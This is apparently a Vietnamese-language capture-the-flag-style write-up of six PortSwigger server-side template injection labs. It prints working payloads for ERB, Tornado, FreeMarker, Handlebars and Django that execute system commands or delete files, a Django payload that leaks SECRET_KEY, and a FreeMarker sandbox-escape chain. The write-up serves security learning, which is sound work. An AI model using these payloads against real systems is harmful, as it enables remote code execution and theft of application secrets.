Portswigger Server-side Template Injection

# Portswigger Server-side Template Injection ## 1. **Basic server-side template injection** Description > This lab is vulnerable to server-side template injection due to the unsafe construction of an ERB template. To solve the lab, review the ERB documentation to find out how to execute arbitrary code, then delete the morale.txt file from Carlos's home directory. Khi truy cập post về product đầu tiên thì xuất hiện thông báo ``out of stock`` được lấy từ tham số ``message`` trên URL -> Có thể dính XSS hoặc SSTI. Nhưng khi test XSS thì không thành công vì đã bị encode. ![jxvaQMv](https://hackmd.io/_uploads/BySpQG8WC.png) **Detect SSTI**: Fuzz ``message`` bằng các kí tự ``${{<%[%'"}}%\`` ta thấy server báo lỗi và phát hiện server sử dụng template ERB của Ruby. ![xg4ks54](https://hackmd.io/_uploads/r15b4fUZ0.png) **Identify** : Đọc syntax của ERB và thử với payload ``<%= 7*7 %>``, ta thấy server render ra ``49`` -> Ứng dụng bị dính SSTI ![om7vZGc](https://hackmd.io/_uploads/rkhSNf8-R.png) **Exploit**: Sử dụng payload ``<%= system('rm /home/carlos/morale.txt') %>`` đẻ xóa file ``morale.txt`` -> server thực thi thành công và trả về ``true``. ![9jntNAf](https://hackmd.io/_uploads/rkrzBfLWA.png) ## 2. **Basic server-side template injection (code context)** Description > This lab is vulnerable to server-side template injection due to the way it unsafely uses a Tornado template. To solve the lab, review the Tornado documentation to discover how to execute arbitrary code, then delete the morale.txt file from Carlos's home directory. You can log in to your own account using the following credentials: wiener:peter Sau khi đăng nhập, ứng dụng có chức năng chỉnh sửa tên hiển thị của user tại các post theo Name, First Name hoặc Nickname. ![4uefhFv](https://hackmd.io/_uploads/Hy53HGU-C.png) Mặc định là Name -> Comment thử vào 1 post thì thấy hiển thị ``Peter Wiener``. ![zZdn2bX](https://hackmd.io/_uploads/BJt18zLW0.png) Thay đổi cách hiển thị bằng nickname. Lúc này tên tác giả comment đã đổi thành nickname. ![BsAMsxT](https://hackmd.io/_uploads/BJX-UM8bA.png) **Detect**: Thử fuzz ``blog-post-author-display`` bằng các kí tự đặc biệt. ![cDZehVH](https://hackmd.io/_uploads/Syp7LMUW0.png) thì server trả lỗi kèm theo tên template là Tornado. ![6WmCoOj](https://hackmd.io/_uploads/ByhELM8WR.png) Lúc này có thể mường tưởng rằng server render tên author bằng ``{{blog-post-author-display}}`` **Identify**: Test ``blog-post-author-display=7*'7'`` ta thấy giả định trên hoàn toàn đúng. ![sj4fcWh](https://hackmd.io/_uploads/ryqt8GIZA.png) **Exploit**: Sử dụng payload sau theo syntax của Tornado để thực hiện xóa file ``morale.txt``. ``` blog-post-author-display=7*'7'}}{% import os %}{{os.system('rm /home/carlos/morale.txt') ``` ## 3. **Server-side template injection using documentation** Description > This lab is vulnerable to server-side template injection. To solve the lab, identify the template engine and use the documentation to work out how to execute arbitrary code, then delete the morale.txt file from Carlos's home directory. You can log in to your own account using the following credentials: content-manager:C0nt3ntM4n4g3r Sau khi đăng nhập, tại mỗi post, ứng dụng có chức năng cho phép ``edit template``. ![F1r4WzC](https://hackmd.io/_uploads/SkT-tz8-R.png) Mình có thể tùy ý sử dụng syntax của template. Mặc định trong file ban đầu, template sử dụng syntax ``${}``. Thử với ``${7*7}`` ta thấy ứng dụng render ra ``49`` thành công. ![BAUZvrA](https://hackmd.io/_uploads/S198Ff8Z0.png) Khi truyền vào expression lỗi ``${a}`` thì server báo lỗi chứa tên template là ``freemaker``. ![aT07aOy](https://hackmd.io/_uploads/rk6tKMUZC.png) Đọc docs cũng như tham khảo payload có sẵn, ta biết được object ``Execute`` để RCE. ``${"freemarker.template.utility.Execute"?new()("rm /home/carlos/morale.txt")}`` ## 4. **Server-side template injection in an unknown language with a documented exploit** Description > This lab is vulnerable to server-side template injection. To solve the lab, identify the template engine and find a documented exploit online that you can use to execute arbitrary code, then delete the morale.txt file from Carlos's home directory. Ứng dụng render lỗi thông qua tham số ``message`` trên URL. ![oPmdp1Q](https://hackmd.io/_uploads/HJlWMQ8-0.png) Fuzz ``message`` bằng ``${{<%[%'"}}%\``, ta thấy server trả lỗi kèm theo tên template engine Handlebars của Nodejs -> Server có thể dính SSTI. ![VB9pS5b](https://hackmd.io/_uploads/rJWVzmIWC.png) Tham khảo payload có sẵn tại hacktrick, ta có thể RCE qua SSTI. ![4VQg5kQ](https://hackmd.io/_uploads/BkADMXLZ0.png) Sửa câu lệnh thành ``rm /home/carlos/morale.txt`` và gửi request với payload đã được URL-encoded. ![P0F5Jkz](https://hackmd.io/_uploads/S1tFMmUbA.png) ## 5. **Server-side template injection with information disclosure via user-supplied objects** Description > This lab is vulnerable to server-side template injection due to the way an object is being passed into the template. This vulnerability can be exploited to access sensitive data. To solve the lab, steal and submit the framework's secret key. You can log in to your own account using the following credentials: content-manager:C0nt3ntM4n4g3r Như các bước trước đó thì ta detect được template mà trang web đang sử dụng là django. Sau khi tham khảo docs cũng như [Link](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#django-templates), ta biết được django có hàm built-in {% debug %} để leak thông tin debug. Kết quả trả về có chứa object khác product là settings. ![e60yF3I](https://hackmd.io/_uploads/r1ynVmLbC.png) Thông thường trong ứng dụng Django, secret key sẽ được lưu tại biến ``SECRET_KEY`` trong object ``settings``. Sử dụng syntax ``{{ settings.SECRET_KEY }}`` và ta lấy được secret key cần tìm. ## 6. **Server-side template injection in a sandboxed environment** Description > This lab uses the Freemarker template engine. It is vulnerable to server-side template injection due to its poorly implemented sandbox. To solve the lab, break out of the sandbox to read the file my_password.txt from Carlos's home directory. Then submit the contents of the file. You can log in to your own account using the following credentials: content-manager:C0nt3ntM4n4g3r Như lab thứ 3 và biết được template mà nó đang sử dụng là Freemaker. Thử RCE thì bằng payload: ``<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}`` Kết quả trả về ``freemarker.template.utility.Execute is not allowed ...`` -> Ứng dụng chỉ cho phép edit trong môi trường sandbox, có thể là **Sandbox is based on method blocklist**. ![YnxJ4FZ](https://hackmd.io/_uploads/HJ_LcXLbR.png) Sau khi đọc [whitepaper](https://media.defcon.org/DEF%20CON%2028/DEF%20CON%20Safe%20Mode%20presentations/DEF%20CON%20Safe%20Mode%20-%20Alvaro%20Mun%CC%83oz%20and%20Oleksandr%20Mirosh%20-%20Room%20For%20Escape%20Scribbling%20Outside%20The%20Lines%20Of%20Template%20Security.pdf) của Blackhat về cách bypass sandbox, ta có thể dùng cách sau dựa vào object product sẵn có: ``` <#assign classloader=product.class.protectionDomain.classLoader> <#assign owc=classloader.loadClass("freemarker.template.ObjectWrapper")> <#assign dwf=owc.getField("DEFAULT_WRAPPER").get(null)> <#assign ec=classloader.loadClass("freemarker.template.utility.Execute")> ${dwf.newInstance(ec,null)("<SYSTEM CMD>")} ```